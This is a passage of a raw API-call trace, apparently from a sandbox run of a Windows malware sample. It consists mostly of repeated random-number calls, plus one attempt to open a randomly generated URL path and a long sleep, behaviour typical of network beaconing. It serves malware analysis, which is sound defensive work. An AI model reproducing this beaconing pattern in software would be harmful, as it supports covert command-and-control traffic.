pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.504] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.513] GetProcessHeap () returned 0x440000 [0211.513] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0211.513] lstrcpyA (in: lpString1=0x472b10, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0211.513] lstrcatA (in: lpString1="\x04", lpString2="/lpxfpbeaxllbl0tGhb8l6f7i3118hl/acgfi3NprmpuqiicxvO1M4bKndfrz4j8l2u0jf9Rkzkm77l/" | out: lpString1="\x04/lpxfpbeaxllbl0tGhb8l6f7i3118hl/acgfi3NprmpuqiicxvO1M4bKndfrz4j8l2u0jf9Rkzkm77l/") returned="\x04/lpxfpbeaxllbl0tGhb8l6f7i3118hl/acgfi3NprmpuqiicxvO1M4bKndfrz4j8l2u0jf9Rkzkm77l/" [0211.513] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0211.513] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/lpxfpbeaxllbl0tGhb8l6f7i3118hl/acgfi3NprmpuqiicxvO1M4bKndfrz4j8l2u0jf9Rkzkm77l/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0211.513] GetProcessHeap () returned 0x440000 [0211.513] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0211.514] GetProcessHeap () returned 0x440000 [0211.514] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0211.514] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0211.514] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0211.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0211.515] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0211.515] Sleep (dwMilliseconds=0x13cdb) [0211.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0211.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0211.853] GetProcessHeap () returned 0x440000 [0211.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17200 [0211.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0211.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17201, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a17201) returned 0x0 [0211.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0211.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17219, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a17219) returned 0x0 [0211.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0211.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17239, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a17239) returned 0x0 [0211.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0211.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0211.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0211.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") 